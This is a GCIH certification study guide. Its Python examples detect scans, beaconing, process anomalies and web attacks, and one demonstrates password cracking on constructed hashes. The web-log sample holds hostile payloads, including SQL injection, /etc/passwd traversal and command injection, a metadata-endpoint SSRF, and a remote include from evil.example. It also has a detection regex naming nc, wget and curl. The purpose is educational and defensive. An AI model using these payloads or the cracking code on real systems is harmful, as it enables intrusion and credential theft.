What is the GCIH certification?
The GCIH (GIAC Certified Incident Handler) validates skills in detecting, responding to, and resolving computer security incidents. It is based on SANS Institute's SEC504 course (Hacker Tools, Techniques, and Incident Handling) and covers incident response phases, common attacker techniques, and countermeasures. The exam is 4 hours with 106-115 questions and requires a passing score of 73%.
The GIAC Certified Incident Handler (GCIH) from the SANS Institute is one of the most respected incident response certifications in the cybersecurity industry. Based on the SANS SEC504 course, it covers both offensive and defensive concepts -- understanding how attackers operate is essential for effective incident response.
GCIH is recognized across government, finance, healthcare, and critical infrastructure sectors, and GIAC certifications have a reputation for technical rigor because they are tied to hands-on SANS courses. The exam costs $949 USD (standalone); the SEC504 course plus exam costs approximately $5,000-$7,000. Certification is valid for 4 years.
Certification Overview
| Detail | Information |
|---|---|
| Certification | GIAC Certified Incident Handler (GCIH) |
| Provider | GIAC (SANS Institute) |
| Based on Course | SANS SEC504: Hacker Tools, Techniques, and Incident Handling |
| Exam Duration | 4 hours |
| Number of Questions | 106-115 |
| Passing Score | 73% |
| Exam Cost | $949 USD (standalone) |
| Validity | 4 years |
| Practice Exams | 2 included with exam registration |
"GCIH preparation requires that you understand attack techniques in detail -- not just what they are but how they work mechanically. The exam is open book, but the questions are too time-pressured to look up answers for things you do not already understand deeply. Build your index carefully and know your material." -- GIAC certification community guidance
Core Topic Areas
Computer Crime Investigation and Incident Handling
Incident response lifecycle (PICERL):
- Preparation: Incident response plan, team roles, tools, communication procedures
- Identification: Detecting and classifying potential incidents
- Containment: Limiting the scope and impact (short-term and long-term containment)
- Eradication: Removing the threat from the environment
- Recovery: Restoring systems and returning to normal operations
- Lessons Learned: Post-incident review and improvement
Legal and compliance considerations:
- Chain of custody for forensic evidence
- Legal search and seizure requirements
- Computer Fraud and Abuse Act (CFAA) and international equivalents
- Evidence preservation techniques
Scanning, Enumeration, and Vulnerability Discovery
Understanding how attackers identify targets and gather information is fundamental to incident response -- you need to recognize attack patterns in logs and network captures.
Attacker tools used in reconnaissance:
- Nmap: Port scanning, service version detection, OS fingerprinting
- Masscan: High-speed network scanning
- Shodan API: Programmatic access to Shodan data for target discovery
- Recon-ng: Modular OSINT framework
Detection of scanning activity:
| Scan Type | Detection Indicator |
|---|---|
| TCP SYN scan | Many SYN packets without completing handshakes |
| UDP scan | ICMP port unreachable responses to many UDP probes |
| Slow scan | Low-frequency connection attempts over long time periods |
| Decoy scan | Same port probed from multiple source IPs simultaneously |
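The four indicators in the table, turned into detection logic, as an added Python example (it is not part of the GCIH or SEC504 material). The Pkt record, the thresholds and the synthetic packet log are assumptions chosen for the demo; in practice the input would be NetFlow, Zeek conn records or firewall logs.

```python
"""Scan-pattern detection over constructed packet summaries (added example)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float          # seconds (constructed timestamps)
    src: str
    dst: str
    proto: str         # "tcp", "udp" or "icmp"
    dport: int = 0
    flags: str = ""    # TCP flags as a string, e.g. "S" (SYN) or "A" (ACK)
    icmp: str = ""     # ICMP type/code; "3/3" = port unreachable


def detect_syn_scans(pkts, min_ports=20):
    """SYN scan: one source sends SYNs to many ports on a host and never
    sends the ACK that would complete the handshake."""
    syns, acks = defaultdict(set), defaultdict(set)
    for p in pkts:
        if p.proto != "tcp":
            continue
        if p.flags == "S":
            syns[(p.src, p.dst)].add(p.dport)
        elif p.flags == "A":
            acks[(p.src, p.dst)].add(p.dport)
    return {k: len(v - acks[k]) for k, v in syns.items()
            if len(v - acks[k]) >= min_ports}


def detect_udp_scans(pkts, min_unreachable=10):
    """UDP scan: closed UDP ports answer with ICMP type 3 code 3, so the
    *target* emits a burst of port-unreachable messages toward the scanner."""
    counts = defaultdict(int)
    for p in pkts:
        if p.proto == "icmp" and p.icmp == "3/3":
            counts[(p.dst, p.src)] += 1          # key = (scanner, target)
    return {k: v for k, v in counts.items() if v >= min_unreachable}


def detect_slow_scans(pkts, min_ports=10, max_per_minute=1.0):
    """Slow scan: many distinct ports probed, but spread thinly over time to
    stay under per-minute rate thresholds."""
    first, last, ports = {}, {}, defaultdict(set)
    for p in pkts:
        if p.proto == "tcp" and p.flags == "S":
            key = (p.src, p.dst)
            first.setdefault(key, p.ts)
            last[key] = p.ts
            ports[key].add(p.dport)
    found = {}
    for key, ps in ports.items():
        span_min = (last[key] - first[key]) / 60
        if len(ps) >= min_ports and span_min > 0 and len(ps) / span_min <= max_per_minute:
            found[key] = (len(ps), round(span_min, 1))
    return found


def detect_decoy_scans(pkts, min_sources=5, window=2.0):
    """Decoy scan (nmap -D): the same target port is hit from several source
    addresses within a short window; only one of them is the real scanner."""
    hits = defaultdict(list)
    for p in pkts:
        if p.proto == "tcp" and p.flags == "S":
            hits[(p.dst, p.dport)].append((p.ts, p.src))
    found = {}
    for key, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            srcs = {s for t, s in events[i:] if t - t0 <= window}
            if len(srcs) >= min_sources:
                found[key] = len(srcs)
                break
    return found


def sample_packets():
    """Constructed traffic: one legitimate client plus four kinds of scan."""
    pkts = []
    for port in range(1, 41):                                   # fast SYN scan, 40 ports in < 1 s
        pkts.append(Pkt(1000 + port * 0.02, "10.0.0.5", "10.0.0.20", "tcp", port, "S"))
    pkts.append(Pkt(1001.0, "10.0.0.7", "10.0.0.20", "tcp", 443, "S"))   # normal client: SYN ...
    pkts.append(Pkt(1001.1, "10.0.0.7", "10.0.0.20", "tcp", 443, "A"))   # ... then ACK
    for _ in range(12):                                         # UDP scan: target replies 3/3
        pkts.append(Pkt(1002.0, "10.0.0.20", "10.0.0.9", "icmp", icmp="3/3"))
    for i in range(15):                                         # slow scan: one port every 20 min
        pkts.append(Pkt(2000 + i * 1200, "10.0.0.11", "10.0.0.20", "tcp", 100 + i, "S"))
    for i in range(6):                                          # decoy scan: six sources, port 22
        pkts.append(Pkt(3000 + i * 0.1, f"192.0.2.{i + 1}", "10.0.0.20", "tcp", 22, "S"))
    return pkts


if __name__ == "__main__":
    pk = sample_packets()
    print("SYN scans:  ", detect_syn_scans(pk))
    print("UDP scans:  ", detect_udp_scans(pk))
    print("slow scans: ", detect_slow_scans(pk))
    print("decoy scans:", detect_decoy_scans(pk))
```

Note that the slow scanner never trips the SYN-scan rule (too few ports) and the fast scanner never trips the slow-scan rule (rate far above one probe per minute); the two rules are complementary, which is why a real sensor needs both.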
Password Attacks and Defense
Password Attack Techniques
Password cracking approaches:
- Offline dictionary attack: Using a wordlist against captured password hashes
- Rule-based attacks: Applying transformation rules to wordlist entries (capitalize first letter, append numbers)
- Hybrid attack: Combining dictionary words with brute-force appended characters
- Rainbow table attack: Looking up precomputed hash-to-plaintext mappings
Common password hashing algorithms by security:
| Algorithm | Strength | Notes |
|---|---|---|
| MD5 (unsalted) | Very weak | Trivially cracked; never use for passwords |
| SHA-1 (unsalted) | Weak | Too fast; precomputed tables exist |
| NTLM | Weak | Unsalted MD4 of the password; fast to crack, and the hash itself is replayable (pass-the-hash) |
| bcrypt | Strong | Intentionally slow; salted by design |
| Argon2id | Very strong | Memory-hard; the first-choice algorithm in OWASP's password storage guidance |
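The attack approaches listed above run against the hashing choices in the table, as an added Python example (not from the SANS material). The wordlist, the mangling rules and the "captured" hashes are constructed here; DEMO_ITERATIONS is kept low so the demo finishes in seconds, whereas OWASP's current figure for PBKDF2-HMAC-SHA256 is 600,000 iterations.

```python
"""Dictionary, rule-based, hybrid and precomputed-table attacks on unsalted
fast hashes, contrasted with a salted slow KDF (added example)."""
import hashlib
import os

WORDLIST = ["password", "summer", "welcome", "dragon", "letmein"]   # constructed
DEMO_ITERATIONS = 10_000   # demo value; production PBKDF2-HMAC-SHA256 should use 600,000


def apply_rules(word):
    """Rule-based mangling of the kind hashcat/John rule files express:
    case changes, common suffixes, simple leet substitution."""
    cands = {word, word.capitalize(), word.upper()}
    for base in list(cands):
        for suffix in ("1", "123", "!", "2024", "2025"):
            cands.add(base + suffix)
    cands.add(word.replace("a", "@").replace("o", "0").replace("e", "3"))
    return cands


def build_lookup_table(wordlist, algo):
    """Precompute hash -> plaintext once. This is the rainbow-table idea
    (minus chain compression) and only works because nothing per-user is
    mixed into the hash."""
    table = {}
    for word in wordlist:
        for cand in apply_rules(word):
            table[hashlib.new(algo, cand.encode()).hexdigest()] = cand
    return table


def crack_unsalted(hashes, wordlist, algo="md5"):
    """Offline dictionary + rules attack: one table cracks any number of hashes."""
    table = build_lookup_table(wordlist, algo)
    return {h: table[h] for h in hashes if h in table}


def hybrid_attack(target_hash, wordlist, algo="sha1", max_digits=2):
    """Hybrid attack: dictionary word followed by a brute-forced numeric tail."""
    for word in wordlist:
        for n in range(10 ** max_digits):
            for cand in {word + str(n), word + str(n).zfill(max_digits)}:
                if hashlib.new(algo, cand.encode()).hexdigest() == target_hash:
                    return cand
    return None


def pbkdf2_store(password, iterations=DEMO_ITERATIONS):
    """Salted, slow storage: returns (salt, digest) as a database row would."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def crack_salted(stored, wordlist, iterations=DEMO_ITERATIONS):
    """With a per-user salt there is no shared table: every candidate must be
    re-derived for this one account, and each derivation costs `iterations`
    HMAC calls. Returns (plaintext or None, derivations performed)."""
    salt, digest = stored
    attempts = 0
    for word in wordlist:
        for cand in apply_rules(word):
            attempts += 1
            if hashlib.pbkdf2_hmac("sha256", cand.encode(), salt, iterations) == digest:
                return cand, attempts
    return None, attempts


# Constructed "captured" hashes standing in for a dumped users table.
CAPTURED_MD5 = [hashlib.md5(p.encode()).hexdigest()
                for p in ("Summer2024", "dragon123", "Tr0ub4dor&3")]
CAPTURED_SHA1 = hashlib.sha1(b"welcome42").hexdigest()
STORED_PBKDF2 = pbkdf2_store("dragon123")

if __name__ == "__main__":
    print(crack_unsalted(CAPTURED_MD5, WORDLIST))   # two of three fall to a single table
    print(hybrid_attack(CAPTURED_SHA1, WORDLIST))   # welcome42
    print(crack_salted(STORED_PBKDF2, WORDLIST))    # same weak password, but per-account work
```

The salted case still falls when the password is in the wordlist; the salt and the slow KDF do not make a weak password strong, they remove the shared precomputation and multiply the attacker's cost per account by the iteration count.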
Defensive Countermeasures
- Account lockout policies: Lock, or progressively delay, after a small number of failed attempts (commonly 3-5) to stop online brute force; set the threshold with care, since aggressive lockout lets an attacker lock users out on purpose, and password spraying (one password tried against many accounts) stays under any per-account threshold, so also alert on failures spread across many accounts
- MFA: Makes password cracking alone insufficient for account compromise
- Privileged Access Workstations (PAW): Dedicated hardened workstations for administrative access
- Credential monitoring: Checking if organizational credentials appear in breach databases
Incident Response Tools
Memory and Disk Forensics
Memory forensics with Volatility (Volatility 2 syntax; --profile must match the OS build of the image):
```bash
vol.py -f memory.dmp --profile=Win10x64 pslist                  # List processes (compare parents against the normal Windows process tree)
vol.py -f memory.dmp --profile=Win10x64 cmdline                 # Process command lines
vol.py -f memory.dmp --profile=Win10x64 netscan                 # Network connections and listening sockets
vol.py -f memory.dmp --profile=Win10x64 malfind                 # Find injected code (executable private memory with no backing file)
vol.py -f memory.dmp --profile=Win10x64 dumpfiles -D /output/   # Extract cached files to /output/
# Volatility 3 equivalents detect the OS build themselves: windows.pslist, windows.cmdline, windows.netscan, windows.malfind, windows.dumpfiles
```
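What to do with pslist output once you have it, as an added Python example (not from the SANS or Volatility material): the listing is constructed and trimmed to PID, PPID and image name; the expected-parent rules reflect the normal Windows boot process tree, and the script-host and lookalike rules are common hunting heuristics. The same parent-child check is how a web server worker spawning a shell shows up in memory.

```python
"""Process-tree sanity checks over a pslist-style listing (added example)."""
from collections import Counter

# Processes whose parent normally stays alive, and what that parent is.
# wininit.exe, csrss.exe and winlogon.exe are started by an smss.exe instance
# that exits, and explorer.exe's parent userinit.exe exits too, so their PPIDs
# usually point at nothing and are not checked here.
EXPECTED_PARENT = {
    "smss.exe": {"system"},
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "svchost.exe": {"services.exe"},
    "taskhostw.exe": {"svchost.exe"},
}
SINGLETONS = {"lsass.exe", "services.exe", "wininit.exe"}     # exactly one instance each
SYSTEM_NAMES = set(EXPECTED_PARENT) | SINGLETONS | {
    "system", "csrss.exe", "winlogon.exe", "explorer.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "w3wp.exe", "httpd.exe", "nginx.exe"}


def one_edit_away(a, b):
    """True if a and b differ by one substitution, insertion or deletion
    (scvhost.exe, lsasss.exe and similar masquerading names)."""
    if abs(len(a) - len(b)) > 1:
        return False
    if len(a) == len(b):
        return sum(x != y for x, y in zip(a, b)) == 1
    short, long_ = sorted((a, b), key=len)
    return any(long_[:i] + long_[i + 1:] == short for i in range(len(long_)))


def parse_pslist(text):
    """Return {pid: (ppid, name)} from lines whose first two columns are integers."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].isdigit() and parts[1].isdigit():
            procs[int(parts[0])] = (int(parts[1]), parts[2])
    return procs


def find_anomalies(pslist_text):
    procs = parse_pslist(pslist_text)
    findings = []
    for pid, (ppid, name) in procs.items():
        lname = name.lower()
        parent = procs.get(ppid, (None, "<absent>"))[1]
        lparent = parent.lower()
        if lname in EXPECTED_PARENT and lparent not in EXPECTED_PARENT[lname]:
            findings.append(f"{name} (PID {pid}) has parent {parent} (PID {ppid}); "
                            f"expected {', '.join(sorted(EXPECTED_PARENT[lname]))}")
        if lname in SCRIPT_HOSTS and lparent in SUSPICIOUS_PARENTS:
            findings.append(f"{parent} (PID {ppid}) spawned {name} (PID {pid})")
        if lname not in SYSTEM_NAMES:
            for known in sorted(SYSTEM_NAMES):
                if one_edit_away(lname, known):
                    findings.append(f"{name} (PID {pid}) is one edit away from {known} (possible masquerading)")
                    break
    for lname, n in Counter(n.lower() for _, n in procs.values()).items():
        if lname in SINGLETONS and n > 1:
            findings.append(f"{n} instances of {lname}; expected exactly one")
    return findings


SAMPLE_PSLIST = """\
PID   PPID  ImageFileName
4     0     System
368   4     smss.exe
520   500   csrss.exe
596   500   wininit.exe
680   596   services.exe
696   596   lsass.exe
812   680   svchost.exe
1184  680   svchost.exe
2200  1184  taskhostw.exe
3404  2248  explorer.exe
4120  3404  svchost.exe
4410  3404  WINWORD.EXE
4560  4410  powershell.exe
4700  680   lsasss.exe
5000  812   w3wp.exe
5100  5000  cmd.exe
"""   # constructed listing; a real one has more columns, which parse_pslist ignores

if __name__ == "__main__":
    for finding in find_anomalies(SAMPLE_PSLIST):
        print(finding)
```

Four findings come out of the constructed listing: svchost.exe under explorer.exe, Word spawning PowerShell, the lookalike lsasss.exe, and the IIS worker spawning cmd.exe. Name-based checks are a starting point only; follow up with cmdline (path and arguments) and malfind on each flagged PID.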
Disk forensics tools:
- Autopsy: GUI-based digital forensics platform
- The Sleuth Kit: Command-line forensics toolkit
- FTK Imager: Disk imaging and evidence acquisition
- dd/dc3dd: Linux command-line disk imaging
Network Forensics
Wireshark display filters for incident investigation (values in angle brackets are placeholders):
```
# DNS tunneling: long query names carry encoded data in subdomain labels; also check query volume per client
dns.qry.name.len > 50
# Large outbound segments (candidate exfiltration); adjust 10.0.0.0/8 to your internal ranges and confirm totals in Statistics > Conversations
tcp.len > 1000 && !(ip.dst == 10.0.0.0/8)
# Isolate one host's HTTP, then look for fixed-interval connections in Statistics > Conversations or an I/O graph (beaconing)
ip.src == <suspicious_ip> && http
# NTLM AUTHENTICATE messages (the message type that carries ntlmssp.auth.username); one source authenticating to many hosts suggests pass-the-hash or other lateral movement
ntlmssp.messagetype == 0x00000003
```
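Beaconing has to be measured rather than filtered for, so here is an added Python example (not part of the original page) that scores inter-arrival regularity over a constructed connection log in a Zeek conn.log-like shape (timestamp, source, destination, destination port). The jitter values and thresholds are assumptions.

```python
"""Beacon detection from connection timing (added example)."""
import statistics
from collections import defaultdict

BASE = 1_700_000_000
JITTER = [0, 4, -3, 5, -5, 2, 6, -4, 1, -6, 3, 0]   # implant sleeping 60 s with about 10% jitter
CONN_LOG = [f"{BASE + 60 * i + j}.000 10.0.0.15 203.0.113.9 443"        # constructed C2 flow
            for i, j in enumerate(JITTER)]
CONN_LOG += [f"{BASE + off}.000 10.0.0.15 198.51.100.7 443"              # constructed human browsing
             for off in (0, 3, 45, 47, 300, 301, 302, 900, 1250, 1300)]


def parse_conn(line):
    ts, src, dst, dport = line.split()
    return float(ts), src, dst, int(dport)


def find_beacons(lines, min_conns=8, max_cv=0.25):
    """Group connections per (src, dst, dport) and flag flows whose
    inter-arrival times are both numerous and regular. cv = stdev / mean,
    so a 60 s beacon with 10% jitter scores near 0.1 while interactive
    traffic scores well above 1."""
    times = defaultdict(list)
    for line in lines:
        ts, src, dst, dport = parse_conn(line)
        times[(src, dst, dport)].append(ts)
    beacons = {}
    for key, ts in times.items():
        if len(ts) < min_conns:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            beacons[key] = {"count": len(ts), "mean_interval": mean, "cv": round(cv, 3)}
    return beacons


if __name__ == "__main__":
    for key, info in find_beacons(CONN_LOG).items():
        print(key, info)
```

Raise max_cv if the implant's configured jitter is large, and pair the timing score with destination reputation and byte counts; a software updater also polls on a fixed interval, so a low cv is a lead, not a verdict.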
Attacker Techniques and Countermeasures
Web Application Attacks
| Attack | How It Works | Detection Method |
|---|---|---|
| SQL Injection | Inserting SQL syntax into input that is concatenated into a query | WAF logs; quote, comment (--) and UNION SELECT patterns in parameters; anomalous queries or database errors |
| XSS | Injecting script that the victim's browser executes | Reflected: script or event-handler payloads in URL parameters; Stored: suspicious markup in user-supplied content |
| Command Injection | Passing shell metacharacters (semicolons, pipes, $( )) through input that reaches an OS command | Web server worker (w3wp.exe, www-data) spawning cmd.exe, sh, or other unexpected child processes |
| File Inclusion | Including local or remote files through an unvalidated path or URL parameter | Traversal sequences (../../etc/passwd), stream wrappers (php://), or external URLs in include-style parameters |
| SSRF | Forcing the server to make requests on the attacker's behalf | Outbound requests from the server to internal hosts or the cloud metadata endpoint (169.254.169.254) |
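Those detection patterns run over web server logs, as an added Python example (not from the original page). The access-log lines are constructed and the signatures are deliberately small; the two points that matter in practice are decoding before matching (attackers double-encode to slip past naive filters) and reporting every matching class for a request rather than the first.

```python
"""Attack-pattern detection over Apache combined-format access logs (added example)."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

SIGNATURES = [
    ("sqli", re.compile(r"""['"]\s*(or|and)\s+[\w'"]+\s*=|union\s+(all\s+)?select|;\s*drop\s""", re.I)),
    ("traversal/lfi", re.compile(r"\.\./|\.\.\\")),
    ("rfi", re.compile(r"[?&](page|file|include|template|path|doc)=(https?|ftp|php|data|expect)://", re.I)),
    ("cmdi", re.compile(r"[;|`]\s*\w|\$\(|\b(cat|whoami|nc|wget|curl)\b\s", re.I)),
    ("ssrf", re.compile(r"169\.254\.169\.254|metadata\.google\.internal|\b(localhost|127\.0\.0\.1)\b", re.I)),
    ("xss", re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.I)),
]


def decode(path):
    """Undo up to two layers of percent-encoding; %252e%252e%252f is ../ after two passes."""
    return unquote(unquote(path))


def classify(path):
    """Every signature class that matches the decoded request, in SIGNATURES order."""
    decoded = decode(path)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_access_log(lines):
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, method, path, status = m.groups()
        cats = classify(path)
        if cats:
            hits.append({"ip": ip, "time": when, "method": method,
                         "path": decode(path), "status": int(status), "categories": cats})
    return hits


SAMPLE_LOG = [   # constructed lines; six attacks and two benign requests
    '203.0.113.5 - - [10/Oct/2025:13:55:36 +0000] "GET /products?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2025:13:55:41 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2025:14:02:10 +0000] "GET /ping?host=127.0.0.1%3Bcat%20%2Fetc%2Fpasswd HTTP/1.1" 500 312 "-" "curl/8.4.0"',
    '198.51.100.23 - - [10/Oct/2025:14:02:55 +0000] "GET /fetch?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 4410 "-" "curl/8.4.0"',
    '192.0.2.77 - - [10/Oct/2025:14:10:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
    '192.0.2.88 - - [10/Oct/2025:14:12:47 +0000] "GET /index.php?page=http%3A%2F%2Fevil.example%2Fshell.txt HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
    '10.0.0.4 - - [10/Oct/2025:14:15:00 +0000] "GET /products?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.4 - - [10/Oct/2025:14:15:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["categories"], hit["path"])
```

The third line is reported as both command injection and SSRF because 127.0.0.1 sits in the same parameter as the injected command; overlapping classes on one request are normal and both belong in the ticket. POST bodies are not in the access log, so this catches only what travels in the URL.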
Malware and Evasion Techniques
Anti-forensics techniques attackers use:
- Timestomping: Modifying file timestamps to confuse forensics timelines
- Log clearing: Deleting Windows event logs and Linux logs
- Living off the land (LOLBAS on Windows, GTFOBins on Linux): Using signed, legitimate system binaries for malicious purposes so that activity blends in with administration and evades EDR
- Encryption: Encrypting C2 communication to evade network inspection
- Process injection: Hiding malicious code inside legitimate processes (svchost, explorer.exe)
"The GCIH exam specifically tests whether you can recognize the artifacts left by common attacker tools in logs, network captures, and memory. For every technique in the course, you should know: how the attack works, what tools are commonly used to execute it, and what evidence it leaves behind in each data source." -- SANS SEC504 community study guidance
Frequently Asked Questions
Is GCIH open book? Yes, the GCIH exam is open book. You can bring printed materials to the testing center. However, open book does not mean easy -- the questions are scenario-based and time-pressured. Most candidates bring a custom index of key concepts, tool syntax, and attack/defense pairings. The index itself becomes a study tool because creating it forces you to organize your knowledge.
How does GCIH compare to CySA+? GCIH and CySA+ both cover incident response and security operations, but at different depths. CySA+ is vendor-neutral and covers a broader range of security operations topics at moderate depth. GCIH is more technically specific, covering attacker tools and techniques in greater detail, and has a reputation as a more challenging and respected certification. Many incident response professionals pursue both to validate breadth (CySA+) and depth (GCIH).
What is the SANS SEC504 course like? SEC504 is a 6-day intensive course typically delivered at SANS training events (live, in-person) or as an on-demand online course. The course uses hands-on exercises throughout, covering each attack technique and the corresponding detection and response methodology, and closes with a capture-the-flag capstone that applies all of the learned skills to a realistic incident response scenario.
References
- GIAC. (2025). GCIH Certification. https://www.giac.org/certifications/certified-incident-handler-gcih/
- SANS Institute. (2025). SEC504: Hacker Tools, Techniques, and Incident Handling. https://www.sans.org/cyber-security-courses/hacker-techniques-incident-handling/
- Cichonski, P., Millar, T., Grance, T., & Scarfone, K. (2012). NIST SP 800-61r2: Computer Security Incident Handling Guide. https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final
- MITRE ATT&CK. (2025). Enterprise Tactics and Techniques. https://attack.mitre.org/
- Volatility Foundation. (2025). Volatility Memory Forensics Framework. https://www.volatilityfoundation.org/
- Luttgens, J., Pepe, M., & Mandia, K. (2014). Incident Response and Computer Forensics, 3rd Edition. McGraw-Hill.
